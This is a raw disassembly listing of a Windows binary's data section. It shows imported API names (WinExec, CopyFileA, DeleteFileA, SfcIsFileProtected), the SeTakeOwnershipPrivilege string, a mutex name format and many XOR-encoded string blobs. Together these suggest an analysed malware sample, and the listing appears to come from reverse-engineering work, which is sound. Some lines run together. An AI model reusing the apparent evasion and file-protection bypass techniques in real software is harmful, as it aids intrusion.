byte_44D819 db 2 dup(0), 0FCh ; DATA XREF: sub_444E43+4F�o
aCocreateinstan db 'CoCreateInstance',0
byte_44D82D db 2 dup(0), 0E1h ; DATA XREF: sub_444E43:loc_444E76�o
aClsidfromstrin db 'CLSIDFromString',0
dword_44D840 dd 6F940000h, 3233656Ch, 6C6C642Eh db 0
byte_44D84D db 2 dup(0), 51h ; DATA XREF: sub_444E43+1�o
aOle32_dll db 'ole32.dll',0
word_44D85A dw 0 ; DATA XREF: sub_444ACE:loc_444D5D�o
db 20h, 5Ch, 0
byte_44D85F db 0 ; DATA XREF: sub_443DD5+55D�o
dd 6157DE00h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
db 74h, 0
word_44D876 dw 0 ; DATA XREF: sub_443DD5+541�o
aGetcomputernam db '>GetComputerNameA',0
word_44D88A dw 0 ; DATA XREF: sub_443DD5+525�o
aVgetenvironmen db 'vGetEnvironmentStringsA',0
dword_44D8A4 dd 46180000h, 45656572h, 7269766Eh, 656D6E6Fh, 7453746Eh
; DATA XREF: sub_443DD5+509�o
dd 676E6972h
db 73h, 41h, 0
byte_44D8BF db 0 ; DATA XREF: sub_443DD5+4ED�o
dd 65472300h, 72754374h, 746E6572h, 65726854h, 64496461h
db 0
byte_44D8D5 db 2 dup(0), 42h ; DATA XREF: sub_443DD5+4D1�o
aGetcurrentpr_0 db 'GetCurrentProcessId',0
dword_44D8EC dd 4FA10000h, 506E6570h, 65636F72h db 2 dup(73h), 0
byte_44D8FB db 0 ; DATA XREF: sub_443DD5+499�o
dd 65472000h, 636F4C74h, 49656C61h, 416F666Eh
db 0
byte_44D90D db 2 dup(0), 0Ah ; DATA XREF: sub_443DD5+47D�o
aGetversionexa db 'GetVersionExA',0
word_44D91E dw 0 ; DATA XREF: sub_443DD5+461�o
aFiletimetosyst db 'ÚFileTimeToSystemTime',0
word_44D936 dw 0 ; DATA XREF: sub_443DD5+445�o
aComparefiletim db ']CompareFileTime',0
byte_44D949 db 2 dup(0), 0DCh ; DATA XREF: sub_443DD5+429�o
aGetvolumeinfor db 'GetVolumeInformationA',0
word_44D962 dw 0 ; DATA XREF: sub_443DD5+40D�o
aHinterlockedde db 'hInterlockedDecrement',0
word_44D97A dw 0 ; DATA XREF: sub_443DD5+3F1�o
aFinterlockedin db 'fInterlockedIncrement',0
word_44D992 dw 0 ; DATA XREF: sub_443DD5+3D5�o
aGetsystemdirec db 0Bh,'GetSystemDirectoryA',0
byte_44D9A9 db 2 dup(0), 2Fh ; DATA XREF: sub_443DD5+3B9�o
aGetmodulefilen db 'GetModuleFileNameA',0
byte_44D9BF db 0 ; DATA XREF: sub_443DD5+39D�o
dd 704F3800h, 754D6E65h, 41786574h
db 0
byte_44D9CD db 2 dup(0), 89h ; DATA XREF: sub_443DD5+381�o
aCreatemutexa db 'CreateMutexA',0
byte_44D9DD db 2 dup(0), 68h ; DATA XREF: sub_443DD5+365�o
aCopyfilea db 'CopyFileA',0
word_44D9EA dw 0 ; DATA XREF: sub_443DD5+349�o
aQgetdiskfreesp db 'qGetDiskFreeSpaceA',0
byte_44D9FF db 0 ; DATA XREF: sub_443DD5+32D�o
dd 6553A300h, 72724574h, 6F4D726Fh
db 64h, 65h, 0
byte_44DA0F db 0 ; DATA XREF: sub_443DD5+311�o
db 0
aUgetexitcodeth db 'îGetExitCodeThread',0
dword_44DA24 dd 47430000h, 72447465h, 54657669h, 41657079h db 0
byte_44DA35 db 2 dup(0), 1Ch ; DATA XREF: sub_443DD5+2D9�o
aFindclose db 'FindClose',0
word_44DA42 dw 0 ; DATA XREF: sub_443DD5+2BD�o
aTfindnextfilea db 'tFindNextFileA',0
byte_44DA53 db 0 ; DATA XREF: sub_443DD5+2A1�o
dd 69465000h, 6946646Eh, 46747372h, 41656C69h
db 0
byte_44DA65 db 2 dup(0), 0C3h ; DATA XREF: sub_443DD5+285�o
aGettickcount db 'GetTickCount',0
byte_44DA75 db 2 dup(0), 9 ; DATA XREF: sub_443DD5+269�o
aRtlzeromemory db 'RtlZeroMemory',0
word_44DA86 dw 0 ; DATA XREF: sub_443DD5+24D�o
aCgetsystemtime db 'æGetSystemTime',0
byte_44DA97 db 0 ; DATA XREF: sub_443DD5+231�o
dd 6F4CE700h, 466C6163h, 656572h
dword_44DAA4 dd 4C950000h, 6C61636Fh, 6F6C6C41h db 63h, 0
word_44DAB2 dw 0 ; DATA XREF: sub_443DD5+1F9�o
aDvirtualfree db 'DVirtualFree',0
byte_44DAC1 db 2 dup(0), 61h ; DATA XREF: sub_443DD5+1DD�o
aVirtualalloc db 'VirtualAlloc',0
byte_44DAD1 db 2 dup(0), 66h ; DATA XREF: sub_443DD5+1C1�o
aReadfile db 'ReadFile',0
byte_44DADD db 2 dup(0), 7Bh ; DATA XREF: sub_443DD5+1A5�o
aGettemppatha db 'GetTempPathA',0
byte_44DAED db 2 dup(0), 42h ; DATA XREF: sub_443DD5+189�o
aGlobalmemoryst db 'GLobalMemoryStatus',0
byte_44DB03 db 0 ; DATA XREF: sub_443DD5+16D�o
dd 754DFC00h, 4269746Ch, 54657479h, 6469576Fh, 61684365h
db 72h, 0
word_44DB1A dw 0 ; DATA XREF: sub_443DD5+151�o
dd 6469577Fh, 61684365h, 4D6F5472h, 69746C75h, 65747942h
db 0
byte_44DB31 db 2 dup(0), 0CFh ; DATA XREF: sub_443DD5+135�o
aWinexec_0 db 'WinExec',0
dword_44DB3C dd 6C350000h, 6C727473h, 576E65hdword_44DB48 dd 47690000h, 69467465h, 6953656Ch db 7Ah, 65h, 0
byte_44DB57 db 0 ; DATA XREF: sub_443DD5+E1�o
dd 6C431E00h, 4865736Fh, 6C646E61h
db 65h, 0
word_44DB66 dw 0 ; DATA XREF: sub_443DD5+C5�o
aCwritefile db 'cWriteFile',0
byte_44DB73 db 0 ; DATA XREF: sub_443DD5+A9�o
dd 65538600h, 6C694674h, 696F5065h, 7265746Eh
db 0
byte_44DB85 db 2 dup(0), 0FDh ; DATA XREF: sub_443DD5+8D�o
aDeletefilea db 'DeleteFileA',0
dword_44DB94 dd 437C0000h, 74616572h, 6C694665h db 65h, 41h, 0
byte_44DBA3 db 0 ; DATA XREF: sub_443DD5+55�o
dd 6F4C1200h, 694C6461h, 72617262h
db 79h, 41h, 0
byte_44DBB3 db 0 ; DATA XREF: sub_443DD5+39�o
dd 65471A00h, 646F4D74h, 48656C75h, 6C646E61h
db 65h, 41h, 0
byte_44DBC7 db 0 ; DATA XREF: sub_443DD5+1D�o
dd 6542A600h
db 65h, 70h, 0
byte_44DBCF db 0 ; DATA XREF: sub_443DD5+1�o
dd 7845F000h, 68547469h, 64616572h
db 0
byte_44DBDD db 3, 0, 80h ; DATA XREF: sub_4435CB+34D�o
dd 0BDEFBBh
dword_44DBE4 dd 18230004h, 1E4C50hdword_44DBEC dd 7F440004h, 6E7920hdword_44DBF4 dd 3, 9900D0h, 97009Dh db 2 dup(0)
word_44DC02 dw 17h ; DATA XREF: sub_44318C:loc_4433B0�o
aXgxgxgxgaxgx_0 db 'Àå£å£å£å£íå£å£å£å£å£î£¯',0
byte_44DC1D db 16h, 0, 0CFh ; DATA XREF: sub_44318C+1DE�o
aMMMMMtMMMMs_0 db 'ê¬ê¬ê¬ê¬ê¬âê¬ê¬ê¬ê¬á½º',0
byte_44DC37 db 0 ; DATA XREF: sub_4430CE+26�o
dd 6B6B1F00h, 78762D71h
db 0
byte_44DC41 db 2 dup(0), 6Dh ; DATA XREF: sub_4430CE:loc_4430E4�o
aS_mtxU db '%s_mtx%u',0
byte_44DC4D db 2 dup(0), 9Eh ; DATA XREF: sub_442DF5:loc_443066�o
db 0
byte_44DC51 db 1, 0, 0FAh ; DATA XREF: sub_442DF5:loc_442FFB�o
db 82h, 0
word_44DC56 dw 0 ; DATA XREF: sub_442C9D:loc_442CD0�o
a4shgetfolderpa db '4SHGetFolderPathA',0
word_44DC6A dw 0 ; DATA XREF: sub_442C9D+1C�o
aQshell32_dll db 'qshell32.dll',0
byte_44DC79 db 2 dup(0), 9Dh ; DATA XREF: sub_442C9D+1�o
aShell32_dll db 'shell32.dll',0
dword_44DC88 dd 73F80000h, 70637274h db 79h, 0
word_44DC92 dw 0 ; DATA XREF: sub_442ADD+183�o
aSvsprintf db 'svsprintf',0
word_44DC9E dw 0 ; DATA XREF: sub_442ADD+167�o
aZsprintf db '‡sprintf',0
byte_44DCA9 db 2 dup(0), 48h ; DATA XREF: sub_442ADD+14B�o
aStrcat db 'strcat',0
byte_44DCB3 db 0 ; DATA XREF: sub_442ADD+12F�o
dd 7273DF00h, 646E61h
dword_44DCBC dd 72A40000h, 646E61hdword_44DCC4 dd 6DE20000h, 65736D65h db 74h, 0
word_44DCCE dw 0 ; DATA XREF: sub_442ADD+DB�o
aMemcpy db 'Òmemcpy',0
dword_44DCD8 dd 6D930000h, 6D636D65h db 70h, 0
word_44DCE2 dw 0 ; DATA XREF: sub_442ADD+A3�o
dd 6C616D14h, 636F6Ch
dword_44DCEC dd 66E60000h, 656572hdword_44DCF4 dd 61290000h, 696F74hdword_44DCFC dd 748D0000h, 7070756Fh db 65h, 72h, 0
byte_44DD07 db 0 ; DATA XREF: sub_442ADD:loc_442B10�o
dd 735F4000h, 7065656Ch
db 0
byte_44DD11 db 2 dup(0), 6 ; DATA XREF: sub_442ADD+1C�o
aCrtdll_dll db 'crtdll.dll',0
byte_44DD1F db 0 ; DATA XREF: sub_442ADD+1�o
dd 72638800h, 6C6C6474h, 6C6C642Eh
db 0
aSetakeownershi db 'SeTakeOwnershipPrivilege',0 ; DATA XREF: sub_4428E6+17F�o
word_44DD46 dw 0 ; DATA XREF: sub_4427FF+3C�o
aXsfcisfileprot db 'åSfcIsFileProtected',0
dword_44DD5C dd 73500000h, 642E6366h db 2 dup(6Ch), 0
byte_44DD67 db 0 ; DATA XREF: sub_4427FF+1�o
dd 6673A500h, 6C642E63h, 6Ch
dword_44DD74 dd 4, 700032h, 76007Dh, 6Bhdword_44DD84 dd 69430001h db 0
byte_44DD89 db 4, 0, 68h ; DATA XREF: sub_441F97+98�o
aLhhh db 'lhhh',0
asc_44DD91 db 0Ah,0 ; DATA XREF: sub_441F34+1C�o
db 0DCh
dd 83BFBAAFh, 0B8F2AFB3h
db 2 dup(0B0h), 0
byte_44DD9F db 0 ; DATA XREF: sub_441F34+1�o
dd 6673DB00h, 736F5F63h, 6C6C642Eh
db 0
byte_44DDAD db 1, 0, 25h ; DATA XREF: sub_441138+CED�o
db 59h, 0
word_44DDB2 dw 2 ; DATA XREF: sub_441138+CC1�o
dd 0C894B4h
dword_44DDB8 dd 2F150001h db 0
byte_44DDBD db 4, 0, 0F9h ; DATA XREF: sub_441138:loc_441D22�o
aM db 'ÙÜŒÃ',0
byte_44DDC5 db 1, 0, 8 ; DATA XREF: sub_441138+6A6�o
db 74h, 0
word_44DDCA dw 0Ah ; DATA XREF: sub_441138+46B�o
dd 166C7050h, 6A1D021Fh, 6E2575h
dword_44DDD8 dd 3C1C000Bh, 5D4E5A20h, 39265951h db 69h, 22h, 0
byte_44DDE7 db 0Ah ; DATA XREF: sub_441138+27B�o
dd 0D9C5E500h, 0A8A4B7A3h, 0DBA8DFA0h, 0
dword_44DDF8 dd 4, 4B0025h, 480044h, 40hdword_44DE08 dd 5, 60070h, 1C0011h, 150005h db 2 dup(0)
word_44DE1A dw 1 ; DATA XREF: sub_440CB4+304�o
db 0DAh, 0F9h, 0
byte_44DE1F db 1 ; DATA XREF: sub_440CB4+2B8�o
dd 0B19200h
dword_44DE24 dd 230001h db 0
byte_44DE29 db 7, 0, 24h ; DATA XREF: sub_440CB4+20F�o
dd 5450504Ch, 0B0B1Eh
dword_44DE34 dd 64470001h db 0
byte_44DE39 db 7, 0, 0CCh ; DATA XREF: sub_440CB4:loc_440DD6�o
dd 0BCB8B8A4h, 0E3E3F6h
dword_44DE44 dd 0A7C4042Bh, 0ACA7A1ACh, 0B6B4AAA1h, 0EAB7B7A1h, 0ABA2AAADh
; DATA XREF: sub_440CB4+10�o
dd 0A8ABA3E7h, 0A8ABB4A0h, 0ABA7EAA8h, 0AAADE7A9h, 0A8ABA3B0h
dd 0ABA7EAA0h, 0B3B3E7A9h, 0A6A7EAB3h, 0B1B6EAB6h, 0B3B3B3E7h
dd 0A7ABB7EAh, 0A5EAB7AFh, 0B0B7E7A7h, 0B4A9B6ABh, 0A7EABDA5h
dd 0A7E7A9ABh, 0ABB0B1B6h, 0B1AAEAB4h, 0B3A1AAE7h, 0A3A3A1EAh
dd 0A9ABA7EAh, 0B3B3B3E7h, 0AAABB4EAh, 0A7B7ADBEh, 0EAB7A9A5h
dd 0E7A9ABA7h, 0A7A8A1B3h, 0F7A1A9ABh, 0ADA9B7EAh, 0A7EAA1A8h
dd 0AFB1EAABh, 0A6A8ABE7h, 0A5AAEAF6h, 0AAABADB0h, 0A7EAB0A1h
dd 0B3E7A9ABh, 0A6EAB3B3h, 0EAAAADA6h, 0A9E7B1B6h, 0A1B0B7A5h
dd 0EABCE9B6h, 0E7A9ABA7h, 0EAB3B3B3h, 0BEAAABB4h, 0A5A7B7ADh
dd 0A7EAB7A9h, 0B3E7A9ABh, 0A6EAB3B3h, 0E9AFAAA5h, 0B5AAA5A6h
dd 0A7E9A1B1h, 0A0A5AAA5h, 0A5A7EAA5h, 0B3B3B3E7h, 0AAABB4EAh
dd 0A7B7ADBEh, 0EAB7A9A5h, 0E7A9ABA7h, 0EAB3B3B3h, 0EAABA9A6h
dd 0E7A9ABA7h, 0B4BDA5B4h, 0A7EAA8A5h, 0A1E7A9ABh, 0EABDA5A6h
dd 0E7A9ABA7h, 0EAB3B3B3h, 0AFAAA5A6h, 0A5A9A2ABh, 0A5B6B1A0h
dd 0A9ABA7EAh, 0B3B3B3E7h, 0A6ADA7EAh, 0ABA7EAA7h, 0B3B3E7A9h
dd 0B0B2EAB3h, 0B1B6EAA6h, 0B3B3B3E7h, 0A6B3A7EAh, 0EAAFAAA5h
dd 0E7A9ABA7h, 0A0A8ABA3h, 0A8A8ABB4h, 0A9ABA7EAh, 0B3B3B3E7h
dd 0AAABB4EAh, 0A7B7ADBEh, 0EAB7A9A5h, 0E7A9ABA7h, 0EAB3B3B3h
dd 0A5A6A9A9h, 0B6EAAFAAh, 0B3B3E7B1h, 0AAB1EAB3h, 0B0B7A5ADh
dd 0EAA9B1B6h, 0A3E7B1B6h, 0B4A0A8ABh, 0EAA8A8ABh, 0E7A9ABA7h
dd 0EAB3B3B3h, 0BEAAABB4h, 0A5A7B7ADh, 0A7EAB7A9h, 0B3E7A9ABh
dd 0B3EAB3B3h, 0A0A8B6ABh, 0AFAAA5A6h, 0A3B6ABEAh, 0B3B3B3E7h
dd 0AAA5A7EAh, 0A5A0ADA0h, 0A1B2A1B0h, 0ADA2ADB6h, 0A7EAB6A1h
dd 0B3E7A9ABh, 0B4EAB3B3h, 0ADBEAAABh, 0A9A5A7B7h, 0ABA7EAB7h
dd 0B3B3E7A9h, 0A5A6EAB3h, 0A2ABAFAAh, 0ADA0AAADh, 0ABA7EAA5h
dd 0B3B3E7A9h, 0A7ADEAB3h, 0AFAAA5A6h, 0E7B1B6EAh, 0AFAAA5A6h
dd 0EAA3AAADh, 0ADA8A5ACh, 0E9BCA5A2h, 0ADA8AAABh, 0A7EAA1AAh
dd 0AFB1EAABh, 0B3B3B3E7h, 0AAA1B2EAh, 0B7B6ABA0h, 0A1A9A5AAh
dd 0E7B7B3EAh, 0EAB3B3B3h, 0EAA6A9AFh, 0B3E7B1B6h, 0AAEAB3B3h
dd 0A5A9B0A1h, 0B0B7ADA3h, 0A7EAB6A1h, 0AFE7A9ABh, 0A5AFB2A5h
dd 0AAA1A7BEh, 0EAB6A1B0h, 0E7A9ABA7h, 0EAB3B3B3h, 0A0AAA1B2h
dd 0AAB7B6ABh, 0EAA1A9A5h, 0A9E7B7B3h, 0A8AAABBDh, 0A5A1AAADh
dd 0B1ABA7A7h, 0F6B7B0AAh, 0A6A6A5EAh, 0A5AABDA1h, 0AAABADB0h
dd 0A7EAA8A5h, 0AFB1EAABh, 0A8AAABE7h, 0E9A1AAADh, 0ADB7B1A6h
dd 0B7B7A1AAh, 0ABA8A8EAh, 0B0B7A0BDh, 0A7EAA6B7h, 0AFB1EAABh
dd 0B3B3B3E7h, 0A8A8A5EAh, 0A6A5ACA5h, 0A5A6A0A5h, 0A7EAAFAAh
dd 0B3E7A9ABh, 0B6EAB3B3h, 0A7EAA7A6h, 0B3E7A9ABh, 0B4EAB3B3h
dd 0ADBEAAABh, 0A9A5A7B7h, 0ABA7EAB7h, 0B3B3E7A9h, 0ACEAF5B3h
dd 0EAA7A6B7h, 0AFE7A5A7h, 0A1B6A6A3h, 0A7BCA5A8h, 0EAA6B1A8h
dd 0BDE7B1B6h, 0ABA6A9A5h, 0BEADA6EAh, 0A0ADAFE7h, 0A6E9B7ABh
dd 0EAAFAAA5h, 0B3E7B1B6h, 0A8EAB3B3h, 0ADA0A7A6h, 0B0A7A1B6h
dd 0B1A5A8EAh, 0B0AAA1B6h, 0A6AAA5ADh, 0EAAFAAA5h, 0A6E7A5A7h
dd 0A8A7B6A5h, 0EAB7BDA5h, 0E7A9ABA7h, 0A5B0ABB0h, 0A2BDA8A8h
dd 0A6A1A1B6h, 0ADAFAAA5h, 0A7EAA3AAh, 0B3E7A9ABh, 0AAEAB3B3h
dd 0A7EAA7A6h, 0F7F1E7A5h, 0AFAAA5A6h, 0A9ABA7EAh, 0B3B3B3E7h
dd 0AAA1B2EAh, 0B7B6ABA0h, 0A1A9A5AAh, 0E7B7B3EAh, 0EAB3B3B3h
dd 0E9A6F6A6h, 0B7B1B6B0h, 0ABA7EAB0h, 0B3B3E7A9h, 0A1B2EAB3h
dd 0B6ABA0AAh, 0A9A5AAB7h, 0B7B3EAA1h, 0A1B4ABE7h, 0AAA5A6AAh
dd 0ABA7EAAFh, 0A5B0E7A9h, 0A1AAE9B0h, 0A5A6B0A2h, 0B6EAAFAAh
dd 0A1B7E7B1h, 0A6A5A8A7h, 0E7B1B6EAh, 0B1A7A1B7h, 0BDB0ADB6h
dd 0EAA6A5A8h, 0A2E7B1B6h, 0A5ACB0A1h, 0A6EAA0B6h, 0A3E7BEADh
dd 0BCAAABB6h, 0AAA5A8B4h, 0EAB7B0A1h, 0B2E7B1B6h, 0ABA0AAA1h
dd 0A5AAB7B6h, 0B3EAA1A9h
db 0B7h, 0E7h, 0
byte_44E273 db 0 ; DATA XREF: sub_4409DF:loc_440BA3�o
dd 7973BE00h, 6D657473h, 666F7270h, 656C69h
dword_44E284 dd 656A0000h, 63697672h db 65h, 0
word_44E28E dw 0 ; DATA XREF: sub_4409DF+101�o
db 0DAh, 24h, 0
byte_44E293 db 0 ; DATA XREF: sub_4409DF:loc_440A7B�o
dd 5320EA00h, 49565245h
db 43h, 45h, 0
byte_44E29F db 0 ; DATA XREF: sub_4409DF:loc_440A38�o
dd 59536800h, 4D455453h
db 0
byte_44E2A9 db 2 dup(0), 0E8h ; DATA XREF: sub_43F4CC+832�o
a_data db '.data',0
asc_44E2B2 db 9,0 ; DATA XREF: sub_43F294+1E2�o
a_bixnydi db '-}_BIXNYdI',0
asc_44E2BF db ',',0 ; DATA XREF: sub_43F294+1D2�o
db 5Dh, 0Eh, 12h
dd 1C0A091Bh, 1001180Fh, 322F3E34h, 293B322Eh, 33340A01h
dd 2E2A3239h, 109137Dh, 2F2F281Eh, 0B293338h, 342E2F38h
db 32h, 33h, 0
byte_44E2EF db 9 ; DATA XREF: sub_43F294+173�o
dd 0C4E6B600h, 0D5C3D2D9h, 0D2FFC2h
dword_44E2FC dd 0C6950029h, 0C2C1D3DAh, 0C9D0C7D4h, 0E7F6FCD8h, 0F3FAE6FAh
; DATA XREF: sub_43F294+163�o
dd 0FCC2C9E1h, 0E2FAF1FBh, 0E0D6C9E6h, 0FBF0E7E7h, 0E7F0C3E1h
dd 0FBFAFCE6h
db 0
byte_44E329 db 1, 0, 0C0h ; DATA XREF: sub_43F294+147�o
db 0EEh, 0
word_44E32E dw 4 ; DATA XREF: sub_43F294+E5�o
aUicr db '¾“›æ',0
word_44E336 dw 3 ; DATA XREF: sub_43F294+9D�o
dd 0C6A3350h
db 0
byte_44E33D db 8, 0, 47h ; DATA XREF: sub_43F294:loc_43F2F9�o
aB2ib2ib2 db 'b2ib2ib2',0
byte_44E349 db 2, 0, 97h ; DATA XREF: sub_43F294+50�o
db 0D9h, 0C3h, 0
byte_44E34F db 2 ; DATA XREF: sub_43F294+32�o
dd 94F5CC00h
db 0
byte_44E355 db 2 dup(0), 0B0h ; DATA XREF: sub_43F19E:loc_43F201�o
db 0
byte_44E359 db 4, 0, 0F9h ; DATA XREF: sub_43EB7A+409�o
aAsn db 'ט',0
byte_44E361 db 4, 0, 0D9h ; DATA XREF: sub_43E7D1+72�o
dd 81E1E9FCh
db 0
byte_44E369 db 0Fh, 0, 18h ; DATA XREF: sub_43E524+90�o
aKdTMb6Tt db '=kD|~t=mb+*6|tt',0
dword_44E37C dd 326000Fh, 404D7A55h, 5C4A5303h, 42081415h db 2 dup(4Ah), 0
byte_44E38F db 0Bh ; DATA XREF: sub_43E524+3B�o
dd 37614400h, 61376118h, 282A6A31h
db 37h, 0
word_44E39E dw 4 ; DATA XREF: sub_43E040+40�o
dd 0C891D7F2h
db 0AEh, 0
word_44E3A6 dw 1 ; DATA XREF: sub_43D8EA:loc_43DDE9�o
db 0D4h, 0F4h, 0
byte_44E3AB db 0 ; DATA XREF: sub_43D8EA+4B6�o
db 0, 0F0h, 0
byte_44E3AF db 13h ; DATA XREF: sub_43D8EA+48C�o
dd 0F6CD9800h, 0FDF4FAF9h, 0B8F7ECB8h, 0F0ECEDF9h, 0E2F1EAF7h
db 0FDh, 0
word_44E3C6 dw 35h ; DATA XREF: sub_43D8EA+47C�o
dd 0D8D7ECB9h, 99DCD5DBh, 0D899D6CDh, 0D6D1CDCCh, 0DCC3D0CBh
dd 0F0999499h, 0EBF6FAF7h, 0EDFAFCEBh, 0F7F0E999h, 0D5E99997h
dd 0DCCAD8DCh, 0D6DA9995h, 0DADCCBCBh
db 0CDh, 97h, 0
byte_44E3FF db 1 ; DATA XREF: sub_43D8EA:loc_43DBA8�o
dd 0EFC200h
dword_44E404 dd 0A7F7001Eh, 8496929Bh, 84D7DB92h, 94929B92h, 8FB2D783h
; DATA XREF: sub_43D8EA+27E�o
dd 96859E87h, 99989E83h, 9692AED7h
db 85h, 0
word_44E426 dw 1 ; DATA XREF: sub_43D8EA:loc_43DAF0�o
db 5Ah, 7Ah, 0
byte_44E42B db 1Fh ; DATA XREF: sub_43D8EA+1BE�o
dd 300C5C00h, 392F3D39h, 392F7C70h, 283F3930h, 2C24197Ch
dd 283D2E35h, 7C323335h, 28323311h
db 34h, 0
word_44E44E dw 2 ; DATA XREF: sub_43D7AB+112�o
dd 676747h
dword_44E454 dd 456A0001h db 0
byte_44E459 db 12h, 0, 2Eh ; DATA XREF: sub_43D7AB:loc_43D7DD�o
dd 5A4D5D43h, 5D715D42h, 5B5A4F5Ah, 5C4F4C5Dh
db 1Dh, 1Ch, 0
byte_44E46F db 0Eh ; DATA XREF: sub_43D7AB+10�o
dd 71441000h, 7E794772h, 53677F74h, 6363717Ch
db 0
byte_44E481 db 5, 0, 0BDh ; DATA XREF: sub_43D4AD+2AB�o
aSSs db '˜Îá˜Î',0
word_44E48A dw 5 ; DATA XREF: sub_43D4AD+23D�o
aCUc db 'Â籞ç±',0
byte_44E493 db 4 ; DATA XREF: sub_43D4AD+17�o
dd 0A1F7D200h
db 8Eh, 0F8h, 0
byte_44E49B db 0 ; DATA XREF: sub_43D16C+303�o
dd 73256500h, 5C7325h
dword_44E4A4 dd 0B7920005h, 0CEE1B7E1h db 0
byte_44E4AD db 2 dup(0), 1Dh ; DATA XREF: sub_43D16C+BF�o
dd 2A7325h
dword_44E4B4 dd 0D0F50004h, 0A9CF96hdword_44E4BC dd 44030000h, 47707369h, 61507465h, 6D6172hdword_44E4CC dd 56480000h, 61697261h, 6E49746Eh db 69h, 74h, 0
byte_44E4DB db 0 ; DATA XREF: sub_43CE34+6B�o
dd 61561F00h, 6E616972h, 656C4374h
db 61h, 72h, 0
byte_44E4EB db 0 ; DATA XREF: sub_43CE34+4F�o
dd 79539A00h, 65724673h, 72745365h, 676E69h
dword_44E4FC dd 538D0000h, 6C417379h, 53636F6Ch, 6E697274h
; DATA XREF: sub_43CE34:loc_43CE67�o
db 67h, 0
word_44E50E dw 0 ; DATA XREF: sub_43CE34+1C�o
dd 656C6F05h, 33747561h, 6C642E32h
db 6Ch, 0
word_44E51E dw 0 ; DATA XREF: sub_43CE34+1�o
aOleaut32_dll db 'Éoleaut32.dll',0
word_44E52E dw 16h ; DATA XREF: sub_43BE21+DD6�o
db 0Fh
aLcfld@aljLAFaz db 'Lcfld/@alj/[`/L`a{fazj',0
dword_44E548 dd 64260006h, 69727273h db 68h, 0
word_44E552 dw 1Eh ; DATA XREF: sub_43BE21+D2F�o
dd 0D05185Dh, 91C0F14h, 7D131214h, 18091C19h, 1C575757h
dd 0D7D1009h, 1E7D1314h, 181912h
dword_44E574 dd 6A390006h, 706D786Dh db 7Ah, 0
word_44E57E dw 0 ; DATA XREF: sub_43BE21+C53�o
db 15h, 0
word_44E582 dw 4 ; DATA XREF: sub_43BE21+C43�o
aOnc db '*onc~',0
word_44E58A dw 6 ; DATA XREF: sub_43BE21+BB6�o
a9_9 db 0Bh,'9;.%9~',0
dword_44E594 dd 0E4C10004h, 0B4F3EFhdword_44E59C dd 6D0000h dword_44E5A0 dd 82C10008h, 8E838C8Eh, 998E83hdword_44E5AC dd 0C80000h dword_44E5B0 dd 0EEAD0008h, 0E2EFE0E2h, 0F5E2EFhdword_44E5BC dd 0A4F70006h, 0BEA3B6A3h db 0B4h, 0
word_44E5C6 dw 6Eh ; DATA XREF: sub_43BE21:loc_43C6D0�o
dd 0E013A6Fh, 4F0A030Dh, 0E4F001Bh, 71B1Ah, 0A15061Dh
dd 1C4A6541h, 1D1F4Fh, 1C1C0A0Ch, 4F080106h, 1B010A0Ch
dd 64F1D0Ah, 11A4F1Ch, 0A030D0Eh, 4F001B4Fh, 71B1A0Eh
dd 15061D00h, 164F0Ah, 0C4F1D1Ah, 4F0B1D0Eh, 65411C4Ah
dd 0A040E22h, 1D000C4Fh, 1B0C0A1Dh, 1C010006h, 0B010E4Fh
dd 161D1B4Fh, 0E080E4Fh, 410106h
dword_44E638 dd 1558000Ah, 3D2C2B39h, 2A391B2Ah db 3Ch, 0
word_44E646 dw 4 ; DATA XREF: sub_43BE21+87D�o
aU db 'žÈ×Íß',0
word_44E64E dw 1 ; DATA XREF: sub_43BE21+7B6�o
db 44h, 64h, 0
byte_44E653 db 6 ; DATA XREF: sub_43BE21+7A6�o
dd 71762500h, 666C7164h
db 0
byte_44E65D db 2 dup(0), 80h ; DATA XREF: sub_43BE21+682�o
db 0
byte_44E661 db 6, 0, 0A7h ; DATA XREF: sub_43BE21+672�o
dd 0F3E6F3F4h
db 0EEh, 0E4h, 0
byte_44E66B db 15h ; DATA XREF: sub_43BE21+5F2�o
dd 0DEF4FE00h, 0ACAEDEDEh, 0ADBBBDB1h, 0B9B0B7ADh, 0B7BFB8DEh
dd 0BABBB2h
dword_44E684 dd 0BBE80006h, 0A1BCA9BCh db 0ABh, 0
word_44E68E dw 6 ; DATA XREF: sub_43BE21+4E3�o
dd 4A50503Bh, 434D16h
dword_44E698 dd 5D180008h, 77746860h, 6A7D6Ahdword_44E6A4 dd 0F6B20009h, 0D0FDD1DDh, 0C6D1D7D8h db 0
byte_44E6B1 db 0Eh, 0, 13h ; DATA XREF: sub_43BE21+430�o
dd 44717247h, 7C777D7Ah, 727F5064h, 6060h
dword_44E6C4 dd 9, 0B0069h, 0F000Ch, 1B0006h, 2C000Ch, 0D0007h
; DATA XREF: sub_43BC02+1BD�o
db 2 dup(0)
word_44E6DE dw 5Fh ; DATA XREF: sub_43BC02+118�o
dd 4743162Ah, 435D0A4Dh, 17425E4Eh, 4F420A1Ah, 5E424D43h
dd 480A1A17h, 4F4E5845h, 0A1A1758h, 17495859h, 5A5E5E42h
dd 0F050510h, 17421559h, 430C590Fh, 0F5F0F17h, 17450C59h
dd 4C0C5F0Fh, 0C490F17h, 0F174359h, 45590C59h, 0C5F0F17h
dd 0F17465Eh, 175C0C5Fh, 4E0C5F0Fh, 14590F17h
db 0
byte_44E741 db 2Ch, 0, 17h ; DATA XREF: sub_43BC02+C3�o
dd 707A7E2Bh, 737E6037h, 272A7F63h, 7E727F37h, 2A637F70h
dd 78753727h, 65727365h, 6437272Ah, 322A7465h, 71283864h
dd 2974322Ah
db 0
byte_44E771 db 7, 0, 0B7h ; DATA XREF: sub_43BC02+5A�o
aLIlsI db '‹Õ‰‹˜Õ‰',0
dword_44E77C dd 80A50004h, 0F99FC6hdword_44E784 dd 0D6F30004h, 0ABC1DDhdword_44E78C dd 51740001h db 0
byte_44E791 db 2, 0, 0F1h ; DATA XREF: sub_43B638:loc_43B677�o
db 0D4h, 92h, 0
byte_44E797 db 0 ; DATA XREF: sub_43B3E1+1BB�o
dd 65533900h, 6C694674h, 63655365h, 74697275h
db 79h, 41h, 0
byte_44E7AB db 0 ; DATA XREF: sub_43B3E1+19F�o
dd 65474800h, 64695374h, 41627553h, 6F687475h, 79746972h
dd 6E756F43h
db 74h, 0
word_44E7C6 dw 0 ; DATA XREF: sub_43B3E1+183�o
aRgetsidsubauth db 'GetSidSubAuthority',0
dword_44E7DC dd 478A0000h, 69537465h, 65644964h, 6669746Eh, 41726569h
; DATA XREF: sub_43B3E1+167�o
dd 6F687475h, 79746972h
db 0
